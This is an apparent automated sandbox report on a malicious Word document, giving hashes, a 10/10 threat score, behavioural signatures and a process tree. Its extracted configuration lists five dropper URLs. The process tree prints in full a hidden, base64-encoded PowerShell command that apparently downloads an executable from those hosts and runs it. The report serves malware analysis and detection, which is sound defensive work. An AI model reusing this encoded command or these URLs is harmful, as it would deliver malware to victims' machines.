Analysis

  • max time kernel
    19s
  • max time network
    18s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    07-12-2020 08:18

General

  • Target

    1aadecae9e168d092eb93dbad3f0473f5c2c11233263ed2ace1269ae81743868.doc

  • Size

    182KB

  • MD5

    11f933cedc18581b6e3cbee57c98989a

  • SHA1

    915d1611aec25ac1c81da90158e8d4d67a6cb2de

  • SHA256

    1aadecae9e168d092eb93dbad3f0473f5c2c11233263ed2ace1269ae81743868

  • SHA512

    6eb7d198b4f57a544307b5318c91c5b18b86c521740a0197e53af4871a66e199eedcaec463c01dcd383c64f24ca908869150806b6fcaf860ec568566c0e26ed8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://hanserefelektrik.com/wp-content/o0zEZ17669/

exe.dropper

http://governessfilms.com/cgi-bin/gnbw2/

exe.dropper

http://forming-a.com/mysql/0s53/

exe.dropper

http://harbour-springs.webonlinepro.com/cgi-bin/pdviP01/

exe.dropper

http://gomitra.com/aspnet_client/xkwsJj/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1aadecae9e168d092eb93dbad3f0473f5c2c11233263ed2ace1269ae81743868.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4764
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3952
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABZAHgAcABmAHYAaQByAGwAawA9ACcARwBsAGsAYgBqAGMAagBxAHUAJwA7ACQAQQBnAGMAeQBiAGcAdABtAGwAbQBlAGMAIAA9ACAAJwAyADcANQAnADsAJABYAHMAcgBqAGwAbQBuAHQAdQByAD0AJwBaAGMAbAB3AGsAZABwAHYAdwBzAHUAdQBpACcAOwAkAEQAeAB4AHoAeQB3AHkAYwB4AHgAcwByAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEAZwBjAHkAYgBnAHQAbQBsAG0AZQBjACsAJwAuAGUAeABlACcAOwAkAEoAdQBsAG0AeQBzAGwAcwA9ACcAWgBnAHkAdwBtAGwAcABvACcAOwAkAEcAYQBnAHYAYwBrAG4AZgBmAGwAdwA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgB3AEUAYgBDAEwAaQBFAG4AdAA7ACQATABsAHoAdABsAG8AaQBrAGUAYwA9ACcAaAB0AHQAcAA6AC8ALwBoAGEAbgBzAGUAcgBlAGYAZQBsAGUAawB0AHIAaQBrAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AbwAwAHoARQBaADEANwA2ADYAOQAvACoAaAB0AHQAcAA6AC8ALwBnAG8AdgBlAHIAbgBlAHMAcwBmAGkAbABtAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBnAG4AYgB3ADIALwAqAGgAdAB0AHAAOgAvAC8AZgBvAHIAbQBpAG4AZwAtAGEALgBjAG8AbQAvAG0AeQBzAHEAbAAvADAAcwA1ADMALwAqAGgAdAB0AHAAOgAvAC8AaABhAHIAYgBvAHUAcgAtAHMAcAByAGkAbgBnAHMALgB3AGUAYgBvAG4AbABpAG4AZQBwAHIAbwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHAAZAB2AGkAUAAwADEALwAqAGgAdAB0AHAAOgAvAC8AZwBvAG0AaQB0AHIAYQAuAGMAbwBtAC8AYQBzAHAAbgBlAHQAXwBjAGwAaQBlAG4AdAAvAHgAawB3AHMASgBqAC8AJwAuACIAUwBwAGwAYABJAFQAIgAoACcAKgAnACkAOwAkAEcAcQBuAGYAcQByAGsAcAA9ACcAWABhAGEAawBkAHoAaQBlAHoAZgBuAGsAeQAnADsAZgBvAHIAZQBhAGMAaAAoACQASQB5AGMAdABiAGoAcABoAG0AbwB2ACAAaQBuACAAJABMAGwAegB0AGwAbwBpAGsAZQBjACkAewB0AHIAeQB7ACQARwBhAGcAdgBjAGsAbgBmAGYAbAB3AC4AIgBkAGAATwB3AE4AbABvAGAAQQBEAEYASQBgAEwARQAiACgAJABJAHkAYwB0AGIAagBwAGgAbQBvAHYALAAgACQARAB4AHgAegB5AHcAeQBjAHgAeABzAHIAcgApADsAJABYAHIAeQBrAGgAZQBnAHcAagB2AD0AJwBGAHcAZwBpAHcAbwBvAGcAeQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEQAeAB4AHoAeQB3AHkAYwB4AHgAcwByAHIAKQAuACIATABlAE4AYABnAGAAVABoACIAIAAtAGcAZQAgADIANAA3ADUAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABEAHgAeAB6AHkAdwB5AGMAeAB4AHMAcgByACkAOwAkAE4AYwBrAHAAZwBuAHcAcwB2AHUAcwBhAD0AJwBXAHQAcQBkAHEAcABsAHMAYwAnADsAYgByAGUAYQBrADsAJABYAHEAdgBqAGwAbQByAGQAZgB4AGUAdQA9ACcAVgB6AHoAbABsAGQAZwB4AHIAcgB1ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFAAeABoAHUAegBjAHgAaQB4AGEAaQBqAD0AJwBXAGYAaAByAHoAegBuAHYAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2088

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2088-14-0x00007FFAE1F50000-0x00007FFAE293C000-memory.dmp

      Filesize

      9.9MB

    • memory/2088-15-0x000001B63F550000-0x000001B63F551000-memory.dmp

      Filesize

      4KB

    • memory/2088-16-0x000001B63F810000-0x000001B63F811000-memory.dmp

      Filesize

      4KB

    • memory/3952-4-0x0000000002280000-0x0000000002281000-memory.dmp

      Filesize

      4KB

    • memory/3952-7-0x0000000002A90000-0x0000000002A91000-memory.dmp

      Filesize

      4KB

    • memory/4764-2-0x0000018CB1860000-0x0000018CB1E97000-memory.dmp

      Filesize

      6.2MB

    • memory/4764-9-0x0000018CBA2A5000-0x0000018CBA2AA000-memory.dmp

      Filesize

      20KB